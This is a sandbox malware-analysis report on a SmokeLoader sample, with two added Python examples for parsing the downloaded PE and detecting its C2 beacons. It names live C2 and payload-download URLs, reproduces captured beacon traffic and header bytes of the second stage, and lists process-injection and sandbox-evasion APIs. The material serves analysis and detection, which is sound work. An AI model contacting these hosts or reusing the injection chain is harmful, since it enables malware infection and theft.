Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Sample Name: qhQ6armJ25.exe
Analysis ID: 528745
MD5: 9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1: afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256: 5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
Tags: Dofoil, exe, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}
Multi AV Scanner detection for submitted file
Source: qhQ6armJ25.exe Virustotal: Detection: 45%
Antivirus detection for URL or domain
Source: http://nalirou70.top/ Avira URL Cloud: Label: phishing
Source: http://privacytoolzfor-you7000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: privacytoolzfor-you7000.top Virustotal: Detection: 6%
Source: xacokuo80.top Virustotal: Detection: 7%
Source: nalirou70.top Virustotal: Detection: 10%
Source: http://xacokuo80.top/ Virustotal: Detection: 7%
Machine Learning detection for sample
Source: qhQ6armJ25.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\gahfeaj Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D380.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: qhQ6armJ25.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: nalirou70.top
Source: C:\Windows\explorer.exe Domain query: privacytoolzfor-you7000.top
Source: C:\Windows\explorer.exe Domain query: xacokuo80.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://nalirou70.top/
Source: Malware configuration extractor URLs: http://xacokuo80.top/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RAPMSB-ASRU
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: application/x-msdos-programContent-Length: 302592Connection: closeLast-Modified: Thu, 25 Nov 2021 17:24:01 GMTETag: "49e00-5d1a03d96f132"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 
01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
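The 200 OK above carries a complete PE image: Content-Type application/x-msdos-program, a body that starts with MZ, and an ETag whose first field (49e00) is the hex file size. The Python below is an added example, not part of the report or of Joe Sandbox. It parses the DOS and NT headers out of the captured bytes and checks two things an analyst wants before pulling the second-stage sample: that the capture is complete (the end of the last raw section must equal the Content-Length) and which sections reserve far more memory than they carry on disk. The byte literal is constructed from the Data Raw dump above; the DOS stub and Rich header region (0x40-0xdf) is zero-filled because the parser does not read it.

```python
"""Parse the PE headers captured in the HTTP 200 response for toolspab2.exe."""
import struct

IMAGE_SCN_MEM_WRITE = 0x80000000

# Constructed from the "Data Raw" bytes of the 200 OK for /downloads/toolspab2.exe.
# Offsets 0x40-0xdf (DOS stub and Rich header) are replaced by zero padding below:
# the parser never reads them and it keeps the literal short.
DOS_HEADER_HEX = (
    "4d5a90000300000004000000ffff0000"  # 0x00  e_magic "MZ" ...
    "b8000000000000004000000000000000"  # 0x10
    "00000000000000000000000000000000"  # 0x20
    "000000000000000000000000e0000000"  # 0x30  e_lfanew = 0xe0
)
NT_HEADERS_HEX = (
    "504500004c0104002a7d9d5f00000000"  # 0xe0  "PE\0\0", i386, 4 sections, TimeDateStamp
    "00000000e00002010b010a0000080300"  # 0xf0  SizeOfOptionalHeader 0xe0, PE32 magic 0x10b
    "00b47c0100000000207c010000100000"  # 0x100 AddressOfEntryPoint 0x17c20
    "00200300000040000010000000020000"  # 0x110 ImageBase 0x400000
    "05000100000000000500010000000000"  # 0x120
    "00008001000400006b2c050002000081"  # 0x130 SizeOfImage 0x1800000, GUI subsystem
    "00001000001000000000100000100000"  # 0x140
    "00000000100000000000000000000000"  # 0x150 16 data directories follow
    "d4fe02007800000000707e01f8670000"  # 0x160 import, resource
    "00000000000000000000000000000000"  # 0x170
    "00e07e01d4170000201400001c000000"  # 0x180 basereloc, debug
    "00000000000000000000000000000000"  # 0x190
    "0000000000000000487a010040000000"  # 0x1a0 load config
    "000000000000000000100000cc030000"  # 0x1b0 IAT
    "00000000000000000000000000000000"  # 0x1c0
    "00000000000000002e74657874000000"  # 0x1d0 section table starts at 0x1d8: .text
    "28060300001000000008030000040000"  # 0x1e0
    "00000000000000000000000020000060"  # 0x1f0
    "2e64617461000000c0417b0100200300"  # 0x200 .data
    "00140000000c03000000000000000000"  # 0x210
    "00000000400000c02e72737263000000"  # 0x220 .rsrc
    "f867000000707e010068000000200300"  # 0x230
    "00000000000000000000000040000040"  # 0x240
    "2e72656c6f630000a814010000e07e01"  # 0x250 .reloc
    "00160100008803000000000000000000"  # 0x260
    "0000000040000042"                  # 0x270
)
SAMPLE = bytes.fromhex(DOS_HEADER_HEX) + bytes(0xE0 - 0x40) + bytes.fromhex(NT_HEADERS_HEX)
CONTENT_LENGTH = 302592  # Content-Length header of the same response


def parse_pe_headers(data: bytes) -> dict:
    """Parse the COFF header, the PE32 optional header and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:
        raise ValueError("not a PE32 optional header: magic 0x%x" % magic)
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i  # section table follows the optional header
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, off)
        sec_chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode(), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rsize, "raw_offset": rptr,
                         "characteristics": sec_chars})
    return {"machine": machine, "number_of_sections": nsec, "timestamp": stamp,
            "characteristics": chars, "entry_point": entry, "image_base": image_base,
            "size_of_image": size_of_image, "subsystem": subsystem,
            "dll_characteristics": dll_chars, "sections": sections}


def expected_file_size(info: dict) -> int:
    """End of the last raw section: an image with no overlay is exactly this long."""
    return max(s["raw_offset"] + s["raw_size"] for s in info["sections"])


def check_content_length(info: dict, content_length: int) -> bool:
    """True when the server's Content-Length matches the size the section table implies."""
    return expected_file_size(info) == content_length


def oversized_writable_sections(info: dict, ratio: int = 16) -> list:
    """Writable sections that reserve far more memory than they carry on disk.
    Here .data asks for ~24 MB backed by 5 KB of file, a common shape for a loader
    that unpacks its payload in place."""
    return [s["name"] for s in info["sections"]
            if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["virtual_size"] > ratio * s["raw_size"]]


if __name__ == "__main__":
    info = parse_pe_headers(SAMPLE)
    print("machine 0x%x, %d sections, timestamp 0x%x" % (info["machine"], info["number_of_sections"], info["timestamp"]))
    print("complete download:", check_content_length(info, CONTENT_LENGTH))
    print("oversized writable sections:", oversized_writable_sections(info))
```

The size check catches truncated captures, which matter because a sandbox may export a partial body that then fails to load in a disassembler; a mismatch in the other direction (file longer than the section table) means an overlay worth carving separately.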
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kwcurllpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: xacokuo80.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
Source: unknown DNS traffic detected: queries for: nalirou70.top
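The beaconing above has a recognisable shape: POST to the site root with a form-urlencoded Content-Type but a binary body, a Referer pointing at a host the client never resolved (edwxjxx.net, kwcurllpj.com, tpjfndspxp.com), an IE11 user agent, and a 404 reply whose chunked body is binary despite a text/html Content-Type. The following Python is an added example for turning those observations into a detection over captured transactions; it is not part of the report. The request, the 404 response and the resolved-domain set are constructed from the lines above (only the first 16 of the 306 body bytes are reproduced; the 404 body is complete), and the benign form submission is invented for contrast. The threshold of three indicators is an assumption to tune against your own traffic.

```python
"""Flag SmokeLoader-style C2 POSTs in a set of captured HTTP transactions."""
import re
from urllib.parse import urlsplit

# Constructed from the POST / request and the 404 reply listed above.
C2_REQUEST = {
    "method": "POST", "path": "/",
    "headers": {
        "Connection": "Keep-Alive",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "*/*",
        "Referer": "http://tpjfndspxp.com/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
        "Content-Length": "306",
        "Host": "xacokuo80.top",
    },
    "body": bytes.fromhex("10878a956c84dcb4cc4b0d337bcf908d"),  # first 16 of 306 bytes
}
C2_RESPONSE = {
    "status": 404,
    "headers": {"Content-Type": "text/html; charset=utf-8", "Transfer-Encoding": "chunked"},
    # chunk "19" (25 bytes) + terminating zero chunk, exactly as captured
    "body": bytes.fromhex("31390d0a" "140000007bfaf01db5692b2c47fa0ea8c1829f4f1ac4da1600" "0d0a300d0a0d0a"),
}
# Domains the client resolved in the same capture (the DNS queries above).
RESOLVED = {"nalirou70.top", "xacokuo80.top", "privacytoolzfor-you7000.top"}

# Invented benign login for contrast: same verb and content type, nothing else in common.
BENIGN_REQUEST = {
    "method": "POST", "path": "/login",
    "headers": {"Host": "shop.example", "Referer": "https://shop.example/login",
                "Content-Type": "application/x-www-form-urlencoded",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/96.0"},
    "body": b"user=alice&password=s3cret%21&remember=on",
}
BENIGN_RESPONSE = {"status": 302, "headers": {"Content-Type": "text/html", "Location": "/account"}, "body": b""}

# Byte set of a genuine application/x-www-form-urlencoded body.
FORM_CHARS = re.compile(rb"^[A-Za-z0-9_.~%+=&-]*$")


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body (size-line in hex, data, CRLF, ..., '0' chunk)."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2


def response_body(resp: dict) -> bytes:
    if resp["headers"].get("Transfer-Encoding", "").lower() == "chunked":
        return dechunk(resp["body"])
    return resp["body"]


def c2_indicators(req: dict, resp: dict, resolved: set) -> list:
    """Return the list of SmokeLoader-style traits found in one request/response pair."""
    reasons, h = [], req["headers"]
    if req["method"] == "POST" and req["path"] == "/":
        reasons.append("POST to the site root")
    if h.get("Content-Type", "").startswith("application/x-www-form-urlencoded") \
            and not FORM_CHARS.match(req["body"]):
        reasons.append("form content type but the body is not form-encoded")
    ref_host = urlsplit(h.get("Referer", "")).hostname
    if ref_host and ref_host != h.get("Host") and ref_host not in resolved:
        reasons.append("Referer host %s was never resolved by this client" % ref_host)
    body = response_body(resp)
    if resp["status"] == 404 and body and not body.lstrip().startswith(b"<"):
        reasons.append("404 reply carries a non-HTML body")
    return reasons


def is_c2_like(req: dict, resp: dict, resolved: set, threshold: int = 3) -> bool:
    return len(c2_indicators(req, resp, resolved)) >= threshold


if __name__ == "__main__":
    for name, rq, rs in (("sample", C2_REQUEST, C2_RESPONSE), ("benign", BENIGN_REQUEST, BENIGN_RESPONSE)):
        print(name, is_c2_like(rq, rs, RESOLVED), c2_indicators(rq, rs, RESOLVED))
```

The user-agent string is deliberately not scored: it is the stock IE11 string and shows up in plenty of legitimate WinINet traffic. The unresolved-Referer check is the cheapest of the four to run at scale, because it needs only DNS and HTTP metadata rather than bodies.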

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: D380.exe, 00000004.00000002.820813732.0000000001F09000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Note: the only evidence is an XML hook-configuration fragment naming DirectDraw (DDRAW.DLL), not DirectInput, found in D380.exe memory; no keyboard, clipboard, microphone or screen capture activity is recorded anywhere in this report, so treat this signature as a weak hit.

System Summary:

Uses 32bit PE files
Source: qhQ6armJ25.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401813 Sleep,NtTerminateProcess, 1_2_00401813
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401842 Sleep,NtTerminateProcess, 1_2_00401842
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_2_00402052
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey, 1_2_00402403
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401812 Sleep,NtTerminateProcess, 1_2_00401812
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 1_2_0040202C
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401830 Sleep,NtTerminateProcess, 1_2_00401830
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401833 Sleep,NtTerminateProcess, 1_2_00401833
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_00401836 Sleep,NtTerminateProcess, 1_2_00401836
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_2_004023D9 NtEnumerateKey, 1_2_004023D9
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 1_1_00402052
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_004023D9 NtEnumerateKey, 1_1_004023D9
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey, 1_1_00402403
Source: C:\Users\user\Desktop\qhQ6armJ25.exe Code function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 1_1_0040202C
Source: C:\Users\user\AppData\Local\Temp\D380.exe Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 4_2_01D20110
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401813 Sleep,NtTerminateProcess, 5_2_00401813
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401842 Sleep,NtTerminateProcess, 5_2_00401842
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation, 5_2_00402052
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey, 5_2_00402403
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401812 Sleep,NtTerminateProcess, 5_2_00401812
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation, 5_2_0040202C
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401830 Sleep,NtTerminateProcess, 5_2_00401830
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401833 Sleep,NtTerminateProcess, 5_2_00401833
Source: C:\Users\user\AppData\Roaming\gahfeaj Code function: 5_2_00401836 Sleep,NtTerminateProcess, 5_2_00401836
